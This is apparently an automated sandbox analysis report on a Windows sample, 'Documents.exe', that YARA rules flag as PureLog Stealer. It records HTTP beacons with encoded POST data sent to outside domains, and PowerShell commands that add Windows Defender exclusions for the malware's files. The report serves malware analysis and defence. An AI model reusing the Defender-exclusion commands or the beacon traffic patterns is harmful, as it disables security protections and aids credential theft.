                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                        Nov 28, 2024 09:16:46.601397991 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        44192.168.2.550026161.97.142.144802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:16:48.036974907 CET543OUTGET /cfqm/?QhKxhNP=FHiNz6b6Wn9oKec3i10x/NxXWu4/t8kjzDy3bn44oOFoUWscXE4DzqYFgJdNnLXTrdZ+ESI+3Oq4E1BzotELfZv0FR4L9xniphkEx7BDvvGrYDhvMkPmWTEebCLVzsH5Qg==&Yby=d2ydCtHpb8 HTTP/1.1
                                                                        Host: www.030002449.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:16:49.317785025 CET1236INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Thu, 28 Nov 2024 08:16:49 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Content-Length: 2966
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: "66cce1df-b96"
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                        Nov 28, 2024 09:16:49.317852020 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                        Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                        Nov 28, 2024 09:16:49.317867041 CET448INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                        Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"
                                                                        Nov 28, 2024 09:16:49.318216085 CET250INData Raw: 09 3c 70 3e 4f 6f 70 73 21 20 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 74 68 65 20 70 61 67 65 20 74 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 3c 2f 70 3e 0a 09 09 09 09 09 09 3c 70 3e 50 6c 65 61 73 65 20 63
                                                                        Data Ascii: <p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></div></div></body><


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        45192.168.2.55002775.2.103.23802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:16:55.232443094 CET820OUTPOST /4ia5/ HTTP/1.1
                                                                        Host: www.innovationpulse.tech
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 208
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.innovationpulse.tech
                                                                        Referer: http://www.innovationpulse.tech/4ia5/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 6c 52 53 48 77 36 34 6e 2b 38 50 6a 4b 2b 75 76 6d 70 79 66 71 4d 45 4e 37 70 78 6d 59 31 66 78 4e 78 66 32 79 45 35 4c 79 59 76 70 44 52 64 33 73 6f 66 73 65 73 62 68 65 43 65 64 6a 69 67 45 4a 33 71 6f 51 6b 59 45 46 35 35 47 71 38 31 37 4b 65 41 62 54 48 67 30 49 2b 4c 58 51 57 73 45 38 34 7a 6b 58 4f 59 42 50 4b 67 6b 55 53 53 31 41 42 4e 6b 79 6d 62 6d 2f 70 6e 54 32 2b 52 62 6b 75 53 54 63 54 30 4c 45 63 33 63 54 51 51 4d 56 73 54 6b 61 7a 6f 6b 7a 70 2b 6e 4c 41 65 4a 4a 39 66 4e 49 68 65 44 41 42 59 67 38 38 64 39 69 4f 4d 4d 6e 34 35 54 4a 45 63 58 37 6a 49 54 35 45 4d 54 49 2b 6f 3d
                                                                        Data Ascii: QhKxhNP=lRSHw64n+8PjK+uvmpyfqMEN7pxmY1fxNxf2yE5LyYvpDRd3sofsesbheCedjigEJ3qoQkYEF55Gq817KeAbTHg0I+LXQWsE84zkXOYBPKgkUSS1ABNkymbm/pnT2+RbkuSTcT0LEc3cTQQMVsTkazokzp+nLAeJJ9fNIheDABYg88d9iOMMn45TJEcX7jIT5EMTI+o=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        46192.168.2.55002875.2.103.23802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:16:57.901714087 CET840OUTPOST /4ia5/ HTTP/1.1
                                                                        Host: www.innovationpulse.tech
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 228
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.innovationpulse.tech
                                                                        Referer: http://www.innovationpulse.tech/4ia5/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 6c 52 53 48 77 36 34 6e 2b 38 50 6a 4c 65 65 76 31 35 4f 66 73 73 45 4b 69 5a 78 6d 58 56 66 31 4e 32 58 32 79 42 64 6c 79 72 62 70 44 31 52 33 6a 4a 66 73 51 4d 62 68 57 69 65 46 6e 69 67 50 4a 33 6d 57 51 68 67 45 46 35 39 47 71 34 35 37 4b 70 55 63 53 58 67 32 45 65 4c 5a 66 32 73 45 38 34 7a 6b 58 4f 4d 2f 50 4c 49 6b 55 44 69 31 41 6a 6c 6a 75 32 62 6c 32 4a 6e 54 38 65 52 58 6b 75 54 47 63 53 6f 78 45 66 66 63 54 53 49 4d 56 2b 72 6a 4a 54 6f 69 74 5a 2f 4e 41 53 50 48 4b 65 6e 32 56 69 2b 46 58 42 73 48 35 4b 73 58 34 73 45 6b 30 59 56 72 5a 58 55 67 71 54 70 36 6a 6e 63 6a 57 70 38 38 6e 6c 2f 6c 72 4e 64 63 62 4d 74 4c 64 36 31 67 32 78 55 4a
                                                                        Data Ascii: QhKxhNP=lRSHw64n+8PjLeev15OfssEKiZxmXVf1N2X2yBdlyrbpD1R3jJfsQMbhWieFnigPJ3mWQhgEF59Gq457KpUcSXg2EeLZf2sE84zkXOM/PLIkUDi1Ajlju2bl2JnT8eRXkuTGcSoxEffcTSIMV+rjJToitZ/NASPHKen2Vi+FXBsH5KsX4sEk0YVrZXUgqTp6jncjWp88nl/lrNdcbMtLd61g2xUJ


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        47192.168.2.55002975.2.103.23802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:17:00.562285900 CET1857OUTPOST /4ia5/ HTTP/1.1
                                                                        Host: www.innovationpulse.tech
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 1244
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.innovationpulse.tech
                                                                        Referer: http://www.innovationpulse.tech/4ia5/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 6c 52 53 48 77 36 34 6e 2b 38 50 6a 4c 65 65 76 31 35 4f 66 73 73 45 4b 69 5a 78 6d 58 56 66 31 4e 32 58 32 79 42 64 6c 79 71 6a 70 41 41 4e 33 69 71 6e 73 54 4d 62 68 59 43 65 52 6e 69 67 6f 4a 33 2b 4b 51 68 6b 55 46 37 31 47 71 64 6c 37 4d 63 6f 63 62 58 67 32 4d 2b 4c 59 51 57 73 72 38 34 6a 67 58 4f 63 2f 50 4c 49 6b 55 41 36 31 4a 52 4e 6a 73 32 62 6d 2f 70 6e 66 32 2b 51 43 6b 75 4c 57 63 53 73 68 45 75 2f 63 53 79 59 4d 55 4e 54 6a 54 54 6f 67 73 5a 2f 56 41 53 44 4d 4b 65 71 59 56 6a 4c 53 58 43 38 48 36 74 64 54 38 66 67 46 6a 70 74 32 53 33 51 6e 72 55 68 45 6a 6b 30 33 58 4a 39 64 76 56 54 38 68 70 70 52 65 2f 63 54 65 64 78 55 32 42 68 57 34 71 48 56 4f 78 42 70 56 56 66 30 34 42 64 2f 50 4e 5a 66 47 63 4b 6d 77 43 32 37 54 51 34 55 4a 6b 56 49 79 54 64 50 36 35 75 79 56 56 6d 56 34 61 65 53 32 34 6f 67 36 58 55 52 70 68 65 78 77 4e 6e 73 63 75 30 46 41 4f 57 4e 52 34 37 32 4b 56 68 43 6a 41 61 50 34 30 30 30 37 37 6c 51 54 71 58 66 65 53 61 52 4c 4f 4a 6a 6f 34 [TRUNCATED]
                                                                        Data Ascii: QhKxhNP=lRSHw64n+8PjLeev15OfssEKiZxmXVf1N2X2yBdlyqjpAAN3iqnsTMbhYCeRnigoJ3+KQhkUF71Gqdl7McocbXg2M+LYQWsr84jgXOc/PLIkUA61JRNjs2bm/pnf2+QCkuLWcSshEu/cSyYMUNTjTTogsZ/VASDMKeqYVjLSXC8H6tdT8fgFjpt2S3QnrUhEjk03XJ9dvVT8hppRe/cTedxU2BhW4qHVOxBpVVf04Bd/PNZfGcKmwC27TQ4UJkVIyTdP65uyVVmV4aeS24og6XURphexwNnscu0FAOWNR472KVhCjAaP400077lQTqXfeSaRLOJjo46v9EBzWO5BJ4NNfuYxA9CAq6HJF1rQnIZOq0vOlTDqpltzp8fL4Er4Vok7CNpPQbCvZi35J9lRLfpmX4q4uigniXOrGxpoHshgXIKZpfwXep/8WremgQ1yfSiJ0xmRcTd2Wu7901wfLjVeMfyVcWiVFIx9dWtSkriE9Ubu9mGkY86WjrIkOtta9omXVpedZLoC40cSYAyoXOeX2bbzMVju3v5Ve/Ve+xWTFiSNcBFxzvqsL+MubAH9xfPwnHwzOtU9kNG+PfPzRnY15dXvARBmGHKzhF6rgEQ+iOaUTornQ/4htmlj+sIGy1enxhb/stX5sNRGBhEGhpSTyZWFCOW87OcsrSxcjcIBjWWmI33NF7zk30J7H2UBetnwPdGhS+gxKaGjc8w1ZnhicTdQ6hZAlhwjoHb98lj4nCRQG4eOAkRgD1fnTy/A7HX00iGefba+kczuya/iJWjC/hNVsXh5lPUEnqAI5vF8WdJYI7+0TuzD6G2gkrlDdPSqJUIhqFBKQP9bP6NkrTsZVu7GZQJkS+v7k9xtxeQIdbcd8iS5OtxM79qkIhOCrSD2Ag0+CTX8zWjargVefS5+R8fKYMuiXMv6fPUqK3erzBr8WLd8n6ZviPtVk0T5buqLUGvYGP7fNjrUPCdM8R6PPiY/iqsSWATxjfEPkC8z [TRUNCATED]


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        48192.168.2.55003075.2.103.23802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:17:03.241503000 CET550OUTGET /4ia5/?Yby=d2ydCtHpb8&QhKxhNP=oT6nzMsk5LGNbZnpqYupld8IqKtrWX3IcFzU22s19J/vOzFqssjWYMTSR1XNlBsCMk+VGX4Yc+V3gPgjU/YcbzdAUc79Tjp71o7bTfkvAIZVHxyoJSYvjU3Ey8bm4rBe7Q== HTTP/1.1
                                                                        Host: www.innovationpulse.tech
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:17:04.372782946 CET410INHTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Thu, 28 Nov 2024 08:17:04 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 270
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 59 62 79 3d 64 32 79 64 43 74 48 70 62 38 26 51 68 4b 78 68 4e 50 3d 6f 54 36 6e 7a 4d 73 6b 35 4c 47 4e 62 5a 6e 70 71 59 75 70 6c 64 38 49 71 4b 74 72 57 58 33 49 63 46 7a 55 32 32 73 31 39 4a 2f 76 4f 7a 46 71 73 73 6a 57 59 4d 54 53 52 31 58 4e 6c 42 73 43 4d 6b 2b 56 47 58 34 59 63 2b 56 33 67 50 67 6a 55 2f 59 63 62 7a 64 41 55 63 37 39 54 6a 70 37 31 6f 37 62 54 66 6b 76 41 49 5a 56 48 78 79 6f 4a 53 59 76 6a 55 33 45 79 38 62 6d 34 72 42 65 37 51 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Yby=d2ydCtHpb8&QhKxhNP=oT6nzMsk5LGNbZnpqYupld8IqKtrWX3IcFzU22s19J/vOzFqssjWYMTSR1XNlBsCMk+VGX4Yc+V3gPgjU/YcbzdAUc79Tjp71o7bTfkvAIZVHxyoJSYvjU3Ey8bm4rBe7Q=="}</script></head></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        49192.168.2.55003113.248.169.48802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:17:10.467845917 CET793OUTPOST /tur7/ HTTP/1.1
                                                                        Host: www.hasan.cloud
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 208
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.hasan.cloud
                                                                        Referer: http://www.hasan.cloud/tur7/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 64 4e 74 59 30 45 4b 5a 4e 39 4d 64 63 59 73 62 42 30 57 2f 72 6e 43 70 53 35 35 66 64 58 48 62 42 65 65 52 43 51 4c 6c 79 54 64 79 6e 31 41 66 5a 32 6a 6d 75 75 36 52 35 69 45 4b 74 56 53 6a 65 31 35 46 62 42 52 48 51 76 35 73 61 65 2f 79 6d 6c 6c 52 76 73 55 6a 39 52 42 73 47 66 76 64 52 67 66 78 34 63 48 79 37 63 73 31 46 30 30 44 62 6d 4f 50 36 57 53 52 59 36 58 44 31 44 6a 57 35 6b 51 30 33 4d 33 41 79 6b 36 2f 75 37 49 38 74 68 58 33 53 34 37 36 61 41 51 35 4f 36 66 4f 56 54 48 35 35 67 30 4f 6d 42 62 41 4c 72 64 72 4c 4a 44 4e 66 54 76 71 6b 58 7a 70 38 39 4a 33 4d 4d 61 2b 61 72 67 3d
                                                                        Data Ascii: QhKxhNP=dNtY0EKZN9MdcYsbB0W/rnCpS55fdXHbBeeRCQLlyTdyn1AfZ2jmuu6R5iEKtVSje15FbBRHQv5sae/ymllRvsUj9RBsGfvdRgfx4cHy7cs1F00DbmOP6WSRY6XD1DjW5kQ03M3Ayk6/u7I8thX3S476aAQ5O6fOVTH55g0OmBbALrdrLJDNfTvqkXzp89J3MMa+arg=


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        50192.168.2.55003213.248.169.4880
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:17:13.527771950 CET813OUTPOST /tur7/ HTTP/1.1
                                                                        Host: www.hasan.cloud
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 228
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.hasan.cloud
                                                                        Referer: http://www.hasan.cloud/tur7/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 64 4e 74 59 30 45 4b 5a 4e 39 4d 64 64 35 63 62 44 54 36 2f 74 48 43 71 52 35 35 66 55 33 48 66 42 65 61 52 43 52 50 50 79 46 4e 79 6d 52 4d 66 59 30 4c 6d 70 75 36 52 74 53 45 4c 67 31 53 53 65 31 30 79 62 42 64 48 51 76 74 73 61 63 58 79 6d 32 4e 53 75 38 55 6c 6f 42 42 75 49 2f 76 64 52 67 66 78 34 63 54 4d 37 61 45 31 46 46 45 44 4a 58 4f 4f 77 32 54 6a 52 61 58 44 78 44 6a 53 35 6b 51 73 33 4f 53 6c 79 6d 79 2f 75 36 34 38 74 56 44 30 4a 49 37 38 48 77 52 35 4e 34 57 72 62 31 66 4b 6d 52 56 78 31 43 2f 2b 4b 64 73 42 52 72 4c 6c 4d 7a 44 53 30 45 37 65 74 4e 6f 65 57 76 4b 4f 45 38 30 2f 43 79 56 4c 79 58 2b 63 6b 38 4c 73 59 58 55 73 58 36 66 37
                                                                        Data Ascii: QhKxhNP=dNtY0EKZN9Mdd5cbDT6/tHCqR55fU3HfBeaRCRPPyFNymRMfY0Lmpu6RtSELg1SSe10ybBdHQvtsacXym2NSu8UloBBuI/vdRgfx4cTM7aE1FFEDJXOOw2TjRaXDxDjS5kQs3OSlymy/u648tVD0JI78HwR5N4Wrb1fKmRVx1C/+KdsBRrLlMzDS0E7etNoeWvKOE80/CyVLyX+ck8LsYXUsX6f7


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:03:13:05
                                                                        Start date:28/11/2024
                                                                        Path:C:\Users\user\Desktop\Documents.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\Documents.exe"
                                                                        Imagebase:0xee0000
                                                                        File size:929'800 bytes
                                                                        MD5 hash:0C0B6ED60E0309998DA4AE71469F1D84
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2156644192.0000000004359000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2160027953.0000000005BD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:3
                                                                        Start time:03:13:13
                                                                        Start date:28/11/2024
                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe"
                                                                        Imagebase:0x850000
                                                                        File size:433'152 bytes
                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:4
                                                                        Start time:03:13:13
                                                                        Start date:28/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:5
                                                                        Start time:03:13:13
                                                                        Start date:28/11/2024
                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uFEeKIucsX.exe"
                                                                        Imagebase:0x850000
                                                                        File size:433'152 bytes
                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
